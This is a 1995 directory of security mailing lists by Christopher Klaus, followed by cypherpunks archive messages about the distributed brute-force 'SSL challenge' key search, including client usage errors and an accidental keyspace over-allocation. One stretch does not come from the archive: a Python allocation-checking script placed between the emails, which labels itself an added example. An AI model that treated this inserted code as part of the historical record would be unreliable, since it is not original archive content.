semantically-content-free data sets. This led to exceptionally high load
averages and a dramatic increase in core entropy.

Further, the number, names and locations of this data appears to change on an
almost daily basis; requiring tedious version control on the part of the mental
maintainer. Best-of-Security is at present an un-moderated list. That may sound
strange given our stated purpose of massive entropy reduction; but because best
often equates with "vital" and the moderator doesn't have an MDA habit it is
important that material sent to this list be delivered to its subscribers in
as minimal a period of time as is (in)humanly possible.

If you find *any* information from *any* source (including other mailing lists,
newsgroups, conference notes, papers, etc) that fits into one of the acceptable
categories described at the end of this document then you should *immediately*
send it to "best-of-security@suburbia.net". Do not try and predict whether or
not someone else will send the item in question to the list in the immediate
future. Unless you're on a time-delayed mail vector such as polled uucp or the
item has already appeared on best-of-security, mail the info to the list! Even
if it is a widely deployed piece of information such as a CERT advisory the
preceding argument still applies. If the information hasn't appeared on this
list yet, then SEND IT. It is far better to run the risk of minor duplication
in exchange for having the information out where it is needed than act
conservatively about occasional doubling up on content.

-------------------------------------------------------------------------------

Bugtraq

To join, send e-mail to LISTSERV@NETSPACE.ORG and, in the text of your message
(not the subject line), write:

     SUBSCRIBE BUGTRAQ

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list's charter.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

   *  Information on Unix related security holes/backdoors (past and present)
   *  Exploit programs, scripts or detailed processes about the above
   *  Patches, workarounds, fixes
   *  Announcements, advisories or warnings
   *  Ideas, future plans or current works dealing with Unix security
   *  Information material regarding vendor contacts and procedures
   *  Individual experiences in dealing with above vendors or security
     organizations
   *  Incident advisories or informational reporting

-------------------------------------------------------------------------------

Computer Privacy Digest

To join, send e-mail to comp-privacy-request@uwm.edu and, in the text of your
message (not the subject line), write:

     subscribe cpd

The Computer PRIVACY Digest (CPD) (formerly the Telecom Privacy digest) is run
by Leonard P. Levine. It is gatewayed to the USENET newsgroup
comp.society.privacy. It is a relatively open (i.e., less tightly moderated)
forum, and was established to provide a forum for discussion on the effect of
technology on privacy. All too often technology is way ahead of the law and
society as it presents us with new devices and applications. Technology can
enhance and detract from privacy.

-------------------------------------------------------------------------------

Computer Underground Digest

To join, send e-mail to LISTSERV@VMD.CSO.UIUC.EDU and, in the text of your
message (not the subject line), write:

     SUB CUDIGEST

CuD is available as a Usenet newsgroup: comp.society.cu-digest

Covers many issues of the computer underground.

-------------------------------------------------------------------------------

Cypherpunks

To join, send e-mail to majordomo@toad.com and, in the text of your message
(not the subject line), write:

     SUBSCRIBE cypherpunks

The cypherpunks list is a forum for discussing personal defenses for privacy in
the digital domain. It is a high volume mailing list.

-------------------------------------------------------------------------------

Cypherpunks Announce

To join, send e-mail to majordomo@toad.com and, in the text of your message
(not the subject line), write:

     SUBSCRIBE cypherpunks-announce

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and important
developments will be posted there.

-------------------------------------------------------------------------------

Firewalls

To join, send e-mail to majordomo@greatcircle.com and, in the text of your
message (not the subject line), write:

     SUBSCRIBE firewalls

Useful information regarding firewalls and how to implement them for security.

This list is for discussions of Internet "firewall" security systems and
related issues. It is an outgrowth of the Firewalls BOF session at the Third
UNIX Security Symposium in Baltimore on September 15, 1992.

-------------------------------------------------------------------------------

Intrusion Detection Systems

To join, send e-mail to majordomo@uow.edu.au with the following in the body of
the message:

     subscribe ids

The list is a forum for discussions on topics related to development of
intrusion detection systems.

Possible topics include:

   *  techniques used to detect intruders in computer systems and computer
     networks
   *  audit collection/filtering
   *  subject profiling
   *  knowledge based expert systems
   *  fuzzy logic systems
   *  neural networks
   *  methods used by intruders (known intrusion scenarios)
   *  cert advisories
   *  scripts and tools used by hackers
   *  computer system policies
   *  universal intrusion detection system

-------------------------------------------------------------------------------

Phrack

To join, send e-mail to phrack@well.com and, in the text of your message (not
the subject line), write:

     SUBSCRIBE Phrack

Phrack is a Hacker Magazine which deals with phreaking and hacking.

-------------------------------------------------------------------------------

PRIVACY Forum

To join, send e-mail to privacy-request@vortex.com and, in the text of your
message (not the subject line), write:

     information privacy

The PRIVACY Forum is run by Lauren Weinstein. He manages it as a rather
selectively moderated digest, somewhat akin to RISKS; it spans the full range
of both technological and non-technological privacy-related issues (with an
emphasis on the former).

-------------------------------------------------------------------------------

Risks

To join, send e-mail to risks-request@csl.sri.com and, in the text of your
message (not the subject line), write:

     SUBSCRIBE

Risks is a digest that describes many of the technological risks that happen in
today's environment.

-------------------------------------------------------------------------------

Sneakers

To join, send e-mail to majordomo@CS.YALE.EDU and, in the text of your message
(not the subject line), write:

     SUBSCRIBE Sneakers

The Sneakers mailing list is for discussion of LEGAL evaluations and
experiments in testing various Internet "firewalls" and other TCP/IP network
security products.

   *  Vendors are welcome to post challenges to the Internet network security
     community
   *  Internet users are welcome to post anecdotal experiences regarding
     (legally) testing the defenses of firewall and security products.
   *  "Above board" organized and/or loosely organized wide area tiger teams
     (WATTs) can share information, report on their progress or eventual
     success here.

There is a WWW page with instructions on un/subscribing as well as posting, and
where notices and pointers to resources (especially if I set up an archive of
this list) may be put up from time to time:

http://www.cs.yale.edu/HTML/YALE/CS/HyPlans/long-morrow/sneakers.html

-------------------------------------------------------------------------------

Virus

To join, send e-mail to LISTSERV@lehigh.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE virus-l your-name

It is an electronic mail discussion forum for sharing information and ideas
about computer viruses, which is also distributed via the Usenet Netnews as
comp.virus. Discussions should include (but not necessarily be limited to):
current events (virus sightings), virus prevention (practical and theoretical),
and virus related questions/answers. The list is moderated and digested. That
means that any message coming in gets sent to me, the editor. I read through
the messages and make sure that they adhere to the guidelines of the list (see
below) and add them to the next digest. Weekly logs of digests are kept by the
LISTSERV (see below for details on how to get them). For those interested in
statistics, VIRUS-L is now up to about 2400 direct subscribers. Of those,
approximately 10% are local redistribution accounts with an unknown number of
readers. In addition, approximately 30,000-40,000 readers read comp.virus on
the USENET.

-------------------------------------------------------------------------------

Virus Alert

To join, send e-mail to LISTSERV@lehigh.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE valert-l your-name

What is VALERT-L?

It is an electronic mail discussion forum for sharing urgent virus warnings
among other computer users. Postings to VALERT-L are strictly limited to
warnings about viruses (e.g., "We here at University/Company X just got hit by
virus Y - what should we do?"). Followups to messages on VALERT-L should be
done either by private e-mail or to VIRUS-L, a moderated, digested, virus
discussion forum also available on this LISTSERV, LISTSERV@LEHIGH.EDU. Note
that any message sent to VALERT-L will be cross-posted in the next VIRUS-L
digest. To preserve the timely nature of such warnings and announcements, the
list is moderated on demand (see posting instructions below for more
information).

What VALERT-L is *not*?

A place to do anything other than announce virus infections or warn people
about particular computer viruses (symptoms, type of machine which is
vulnerable, etc.).

-------------------------------------------------------------------------------

Security Products

-------------------------------------------------------------------------------

Tiger

To join, send e-mail to majordomo@net.tamu.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE tiger

Discussion list for the UNIX security audit tool TIGER

This is the TIGER users mailing list. It is for:

  1.  Update announcements
  2.  Reporting bugs in TIGER.
  3.  Discussing new features for TIGER.
  4.  Discussing use of TIGER.
  5.  Discussing anything else about TIGER.

What is TIGER?

TIGER is a set of shell scripts, C code and configuration files which are used
to perform a security audit on UNIX systems. The goals for TIGER are to make it
very robust and easy to use. TIGER was originally developed for checking hosts
at Texas A&M University following a break-in in the Fall of 1992.

The latest version of TIGER is always available from the directory
net.tamu.edu:/pub/security/TAMU. In addition, updated digital signature files
for new platforms and new security patches will be maintained in the directory:

net.tamu.edu:/pub/security/TAMU/tiger-sigs.

-------------------------------------------------------------------------------

TIS Firewall Toolkit

To join, send e-mail to fwall-users-request@tis.com and, in the text of your
message (not the subject line), write:

     SUBSCRIBE

Discussion list for the TIS firewall toolkit

-------------------------------------------------------------------------------

Vendors and Organizations

-------------------------------------------------------------------------------

CERT (Computer Emergency Response Team) Advisory mailing list.

To join, send e-mail to cert@cert.org and, in the text of your message (not the
subject line), write:

     I want to be on your mailing list.

Past advisories and other information related to computer security are
available for anonymous FTP from cert.org (192.88.209.5).

-------------------------------------------------------------------------------

The CIAC (Computer Incident Advisory Capability) of DoE

CIAC has several self-subscribing mailing lists for electronic publications:

  1.  CIAC-BULLETIN for Advisories, highest priority - time critical
     information and Bulletins, important computer security information;
  2.  CIAC-NOTES for Notes, a collection of computer security articles;
  3.  SPI-ANNOUNCE for official news about Security Profile Inspector (SPI)
     software updates, new features, distribution and availability;
  4.  SPI-NOTES, for discussion of problems and solutions regarding the use of
     SPI products.

To join, send e-mail to ciac-listproc@llnl.gov and, in the text of your message
(not the subject line), write any of the following examples:

     subscribe ciac-bulletin LastName, FirstName PhoneNumber
     subscribe ciac-notes LastName, FirstName PhoneNumber
     subscribe spi-announce LastName, FirstName PhoneNumber
     subscribe spi-notes LastName, FirstName PhoneNumber
     e.g., subscribe ciac-notes O'Hara, Scarlett 404-555-1212

You will receive an acknowledgment containing address, initial PIN, and
information on how to change either of them, cancel your subscription, or get
help.

-------------------------------------------------------------------------------

HP, Hewlett Packard

To join, send e-mail to support@support.mayfield.hp.com and, in the text of
your message (not the subject line), write:

     subscribe security_info

The latest digest of new HP Security Bulletins will be distributed directly to
your mailbox on a routine basis.

-------------------------------------------------------------------------------

Sun Security Alert

To join, send e-mail to security-alert@sun.com and, in the subject of your
message write:

     SUBSCRIBE CWS your-email-addr

The message body should contain affiliation and contact information.

-------------------------------------------------------------------------------

Copyright

This paper is Copyright (c) 1995
   by Christopher Klaus of Internet Security Systems, Inc.

Permission is hereby granted to give away free copies electronically. You may
distribute, transfer, or spread this paper electronically. You may not pretend
that you wrote it. This copyright notice must be maintained in any copy made.
If you wish to reprint the whole or any part of this paper in any other medium
excluding electronic medium, please ask the author for permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in connection with the use
or spread of this information. Any use of this information is at the user's own
risk.

Address of Author

Please send suggestions, updates, and comments to:
Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
<iss@iss.net>

Internet Security Systems, Inc.

Internet Security Systems, Inc, located in Atlanta, Ga., specializes in the
development of security scanning software tools. Its flagship product,
Internet Scanner, is software that learns an organization's network and probes
every device on that network for security holes. It is the most comprehensive
"attack simulator" available, checking for over 100 security vulnerabilities.
-- 
Christopher William Klaus	     Voice: (770)441-2531. Fax: (770)441-2431
Internet Security Systems, Inc.            "Internet Scanner lets you find
2000 Miller Court West, Norcross, GA 30071   your network security holes 
Web: http://iss.net/  Email: cklaus@iss.net   before the hackers do."



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 16:08:05 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: server congestion?
In-Reply-To: <"swan.cl.cam.:271770:950824230145"@cl.cam.ac.uk>
Message-ID: <199508242307.QAA26628@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| The design of the protocol assumes a hierarchy -- maybe in the next attempt.

Ok, neat. I was merely thinking of a simple static partitioning of it
right now.

| but there are problems with acking to the right server, deciding which to
| contact, etc.

I was rather thinking of a simplistic solution right now, looking in
the log of active calculators, roughly dividing them up into two
similarly sized groups etc. But I guess this isn't as easy as I
thought it would be.

| > Another thing that might decrease the load on the server
| > is if we start allocating more blocks at a time, let's
| > say 2-4 blocks each time. Wouldn't that help?
| 
| I think most of the load is "HELO COMM QUIT" clients.
| Yes -- we had thought of upping the allocation ....

Ok.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Thu, 24 Aug 95 14:23:24 PDT
To: cypherpunks@toad.com
Subject: SSL CHALLENGE
In-Reply-To: <9508242051.AA13777@toad.com>
Message-ID: <Pine.BSD.3.91.950824162000.5485B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



I have a small Linux box doing 1000 keys per second.  I had to 
re-download the brloop and brclient, 'cause when I viewed them on the WWW 
page and attempted to save them I forgot that Lynx will truncate some 
lines, leaving me with some errors.  I got complete correct versions and 
the box is chugging away.

Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting   It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jered@MIT.EDU
Date: Thu, 24 Aug 95 13:32:08 PDT
To: cypherpunks@toad.com
Subject: BruteSSL: WTF? 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>
Message-ID: <199508242031.QAA04083@narn.atype.com>
MIME-Version: 1.0
Content-Type: text/plain



It appears that Joe Thomas <jthomas@ogi.com> has more or less locked
(until things start getting reassigned) most of the keyspace.  Even if
he had a MasPar, it would still take him more than 2 days to check this
space.  Does anyone know what the deal with this is?  A simple error?
A malicious attack? (I think that the SKSP is far too insecure to be
effective....I could falsely ACK parts of the keyspace if I wanted to be
mean.) An NSA agent who will check that keyspace and return the results
in the next hour?

--Jered
jered@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Thu, 24 Aug 95 15:53:31 PDT
To: cypherpunks@toad.com
Subject: Re: server congestion
Message-ID: <199508242251.QAA23003@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Christian Wettergren:
>is if we start allocating more blocks at a time, let's
>say 2-4 blocks each time. Wouldn't that help?
 
Heh heh heh
 
Somebody should tell that to the guy who's pulling them down 500 at a time.
I have to settle for 32 x 7 at a time, in order to manage runtime at 9 hours.
And the clever thing is, I have to stay connected to all 7 machines in order
to keep running.
 
Good thing there's an incremental notice, so I can restart if I lose carrier.
 
You know, this is really fun. Too bad the prize isn't something really cool,
like a free wastebasket in case Windoze 95 comes my way...
 
 
Sorry, just felt like it was my turn to babble...
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 13:51:45 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
Message-ID: <9508242051.AA13777@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been looking at the allocated list of keys, and I notice a possible 
problem:  One user has allocated 50,000 segments:

0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>

Now, it's possible this fellow has some vast farm of high-speed 
workstations, but I doubt it.  Finger suggests that this is a linux
box.  My suspicion - and let me apologize in advance if I'm wrong - is
that Mr. Thomas thinks he's allocated himself
50,000 keys, whereas he's actually got  838,860,800,000.

Mr Thomas, if you're listening, PLEASE tell us what's going on.
You've reserved 3/4 of the keyspace, and you're going to screw up the 
search unless you have an NSA-sized data center.

I suggest we assume this is an error, and remove the block from the
reserved list so that it can be re-allocated.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 08:56:32 PDT
To: frissell@com.panix
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
In-Reply-To: <199508241543.LAA07735@panix.com>
Message-ID: <11763.9508241555@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell <frissell@panix.com> writes on cpunks:
> Is that really 1800 GMT or 1800 BST?  1400 or 1300 hrs EDT?

Yep really 18:00 GMT, ie slightly over 2 hours from now approx.

> I'm ready to hurl my 7800 keys/sec 486/66 into the fray.  I should be able
> to do about 24 segments over 12 hours tonight using brutessl.exe 1.02 for
> DOS.  Maybe I should have been in line at Midnight to get WIN/95 so I could
> run it automatically.
>
> The 32-bit Windows version does *not* work with my old Windows 3.11 even
> with the latest Microsoft 32-bit add in.

Yep, getting a decent 32 bit app for windows / DOS seems to be a
problem alright.  Pity as the 32 bit app runs appreciably faster.

I made a plea for a DJGCC (DOS port of GNU cc) compiled binary, that
would run under bog standard DOS, and with full 32 bit, if we can find
anyone with the software to do it.  Any takers?

The prize fund has grown to c$ 372.30.

Ready, steady, go!

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 14:11:45 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL CHALLENGE: 0.11 borken?
In-Reply-To: <"swan.cl.cam.:219400:950824204042"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824170950.22646B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Just downloaded the newest stuff and got:

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

Server not responding: Timed out

What do you make of that? (I'm running Linux)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jthomas@ogi.com (Joe Thomas)
Date: Thu, 24 Aug 95 14:09:31 PDT
To: rkw@dataplex.net (Richard Wackerbarth)
Subject: Re: Keys for ssl search
Message-ID: <m0sljjU-0007W0C@ogi>
MIME-Version: 1.0
Content-Type: text/plain


>0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>
>
>You have allocated over 3/4 of the total search space.
>I think that you accidentally "bit off more than you can chew"
>The count is 2^24 keys per keyspace.
>
>Please return the extra keys and select a reasonable number (like 1 or 2)
>unless you have a superfast cluster of Crays.

(Noted by several others, too)

Sorry about this!  The Windows NT client asked "how many keys" I wanted to
check, not how many key segments.  50,000 sounded like a few seconds' work
on my P120.  I've attempted to return the keys using the "reject" button
(again on the Win32 client), but I don't think it took.  If anyone can tell
me what the quickest way to return these keys is, I'd really appreciate it.

Sorry, all,
Joe Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 14:25:06 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: brloop not working
In-Reply-To: <"swan.cl.cam.:150900:950824172806"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824172125.22646D-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Ah, found the problem.  Where is that "-" coming from??? [Linux]

++ nice -20 brutessl - 2977 d42f 1
usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

I've stopped it until I can get that fixed.  brclient is way huge now...I 
can't see how to get rid of the "-".

 -Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 17:24:13 PDT
To: ghio@cmu.edu (Matthew Ghio)
Subject: Re: Linux brutessl client
In-Reply-To: <m0slm0V-000wQYC@myriad>
Message-ID: <199508250023.RAA28560@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| I get 11100 keys/sec with Linux/gcc 2.5.8 on a 486/66, optimized with
| -O2 and -fomit-frame-pointer.
| 
| -fforce-mem and -funroll-loops made the program run more slowly.
| 
| I also tried -ffast-math -finline-functions -fforce-addr -fcaller-saves
| which seemed to make no difference.

I've tried to optimize the SunOS binary, but it seems as if 16400
keys/s is the maximum I can get on a SS10. No changes in optimization
flags have helped so far.

Has anyone got a better speed than this on an ordinary ss10, with SunOS
414?

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jthomas@ogi.com (Joe Thomas)
Date: Thu, 24 Aug 95 14:15:11 PDT
To: trei@process.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
Message-ID: <m0sljpH-0007W0C@ogi>
MIME-Version: 1.0
Content-Type: text/plain


You're right, I asked (I thought) for 50,000 keys -- a couple seconds' work
on my machine -- and got back 50,000 segments.  The WinNT client thinks it's
sent them back, but the web page still lists them as mine.  I can't find a
form on Adam's web site for sending back keys, either.

>I suggest we assume this is an error, and remove the block from the
>reserved list so that it can be re-allocated.

Please do, if you can!

Thanks,
Joe
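
The allocation line discussed in this thread, checked the way a key server could check a request before reserving it. This is an added example, not part of any original post and not code from brutessl or brclient; the field layout, the 16-bit segment index and the `hard_cap` policy value are assumptions.

```python
import re
from dataclasses import dataclass

KEYS_PER_SEGMENT = 2 ** 24   # from the thread: "The count is 2^24 keys per keyspace"
TOTAL_SEGMENTS = 2 ** 16     # assumption: 4-hex-digit segment ids, i.e. a 40-bit search

# Assumed field layout: <first>-<last> <status> <first> <count> <owner>
LINE_RE = re.compile(
    r"^(?P<first>[0-9a-f]{4})-(?P<last>[0-9a-f]{4})\s+(?P<status>[A-Z]+)\s+"
    r"(?P<start>[0-9a-f]{4})\s+(?P<count>\d+)\s+(?P<owner>.+)$"
)


@dataclass(frozen=True)
class Allocation:
    first: int
    last: int
    status: str
    owner: str

    @property
    def segments(self) -> int:
        return self.last - self.first + 1

    @property
    def keys(self) -> int:
        return self.segments * KEYS_PER_SEGMENT

    @property
    def keyspace_fraction(self) -> float:
        return self.segments / TOTAL_SEGMENTS


def parse_allocation(line: str) -> Allocation:
    """Parse one allocation line and reject it if range and count disagree."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised allocation line: {line!r}")
    first, last, start = (int(m[k], 16) for k in ("first", "last", "start"))
    if last < first or start != first or int(m["count"]) != last - first + 1:
        raise ValueError(f"range and count disagree: {line!r}")
    return Allocation(first, last, m["status"], m["owner"])


def hours_needed(alloc: Allocation, keys_per_sec: float) -> float:
    """Wall-clock hours to sweep the whole allocation at the given rate."""
    return alloc.keys / keys_per_sec / 3600


def max_segments(keys_per_sec: float, hours: float) -> int:
    """Whole segments a client at this rate can finish in the given time."""
    return int(keys_per_sec * hours * 3600) // KEYS_PER_SEGMENT


def review(alloc: Allocation, keys_per_sec: float,
           max_hours: float = 24.0, hard_cap: int = 512):
    """Return (ok, reason). The rate is self-reported by the client, so the
    hard cap (an arbitrary policy value here) bounds what any one request
    can lock regardless of the rate claimed."""
    budget = min(max_segments(keys_per_sec, max_hours), hard_cap)
    if alloc.segments > budget:
        return False, (f"{alloc.segments} segments requested, budget is {budget} "
                       f"({alloc.keyspace_fraction:.1%} of the keyspace, "
                       f"{hours_needed(alloc, keys_per_sec):,.0f} h at "
                       f"{keys_per_sec:g} keys/s)")
    return True, "within budget"


# The line quoted in the thread, plus one constructed request for comparison.
THREAD_LINE = "0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>"
CONSTRUCTED_LINE = "1000-101f NOACK 1000 32 Constructed User <user@example.invalid>"

if __name__ == "__main__":
    for line in (THREAD_LINE, CONSTRUCTED_LINE):
        alloc = parse_allocation(line)
        # 16400 keys/s is the SS10 figure reported elsewhere in this thread.
        print(alloc.owner, alloc.keys, review(alloc, 16400))
```

A check like this on the server side turns a keys-versus-segments mix-up in a client into a rejected request instead of a locked keyspace.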





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 14:35:56 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: brloop not working
In-Reply-To: <"swan.cl.cam.:150900:950824172806"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824172624.22646F-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Piete Brooks wrote:

> The first arg of brutessl is the file from which to read the config info.
> "-" is a unix convention for the file "stdin".

OK - I dig this, but brutessl on my Linux box is still complaining about 
usage...(sorry about the bandwidth but I assume other people are probably 
having similar problems)

+ eval brclient -dklLtssl|(read a;nice -20 brutessl - $a)|(read a;echo  
$a 1>&2;
 echo $a) |brclient -AlLtssl
++ brclient -dklLtssl
++ brclient -AlLtssl
++ read a
++ read a
++ nice -20 brutessl -
usage: brutessl [-q] <filename> <checksum> <start segment> <no of 
segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 17:42:30 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz meeting/party
Message-ID: <199508250042.RAA28903@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

Anyone in the Palo Alto area going to Tim's who would like
to give me a ride there? If so, drop me a line.

And Tim, take that as indication that I'm interested in
participating in the meeting. :-)

/Christian Wettergren
 Nordic Viking
 Sweden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Thu, 24 Aug 95 14:46:28 PDT
To: tedwards@src.umd.edu (Thomas Grant Edwards)
Subject: Re: brloop not working
In-Reply-To: <Pine.SUN.3.91.950824172624.22646F-100000@thrash.src.umd.edu>
Message-ID: <199508242146.RAA21529@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > The first arg of brutessl is the file from which to read the config info.
> > "-" is a unix convention for the file "stdin".
> 
> OK - I dig this, but brutessl on my Linux box is still complaining about 
> usage...(sorry about the bandwidth but I assume other people are probably 
> having similar problems)
> 
> ++ nice -20 brutessl -
> usage: brutessl [-q] <filename> <checksum> <start segment> <no of 
> segments>
>        brutessl [-q] -r <filename> [<no of segments>]
>        brutessl [-q] -t [<hours>[:<minutes>]]
>

Use 'nice -20 brutessl -- -' instead. The '--' tells getopts() not to parse
anything else as arguments, then the next '-' will be interpreted correctly.

Tom

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 I'm not allowed to have an opinion.   |between gas or electricity"-D.Banisar
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 24 Aug 95 08:52:11 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <9508241550.AA01200@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



There are also some links on 

  http://iaks-www.ira.uka.de/subjects/crypto.html

to ftp-servers with cryptographic stuff outside USA/Canada.


The page contains several crypto-related links and is
written in German, but the ftp links at the end
of the page are language-independent.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 24 Aug 95 15:12:55 PDT
To: cypherpunks@toad.com
Subject: Re: Matt Blaze's paper on Clipper...
In-Reply-To: <199508241933.MAA21565@Csli.Stanford.EDU>
Message-ID: <m0slkIr-000wQYC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Christian Wettergren asked:
>I don't seem to be able to locate it, but I had it earlier on.
>Do anyone know where it is?
>
>I'm talking to a reporter about the EPIC alert, and wants to show
>him Matt's attack.

ftp.research.att.com /dist/mab/essproto.ps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 24 Aug 95 17:59:45 PDT
To: cypherpunks@toad.com
Subject: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <9508250015.AA22053@toad.com>
Message-ID: <199508250059.RAA02668@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Peter Trei" <trei@process.com> writes:
> I can't contact the server to request keyspace anymore - I get a...
> It looks like 12 hours on a P5/90 are going to waste (could have done...

Live and/or learn -- looks like the performance is a little better now
that they're handing out bigger chunks.  The important thing is to learn
something new each time so the next one goes more smoothly.  Should be
nicer with hierarchical servers and so on for the next challenge... DES
or lobotomized DES or whatever.

Re: the title above.  Remember in "Princess Bride" where Prince Humperdinck
tells an underling to go search the forest and rout out the troublemakers?
When he complained of the difficulty, he was told to form a "brute squad".

	Jim Gillogly
	Sterday, 3 Halimath S.R. 1995, 00:59




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 15:24:31 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: brloop not working
In-Reply-To: <"swan.cl.cam.:242090:950824214413"@cl.cam.ac.uk>
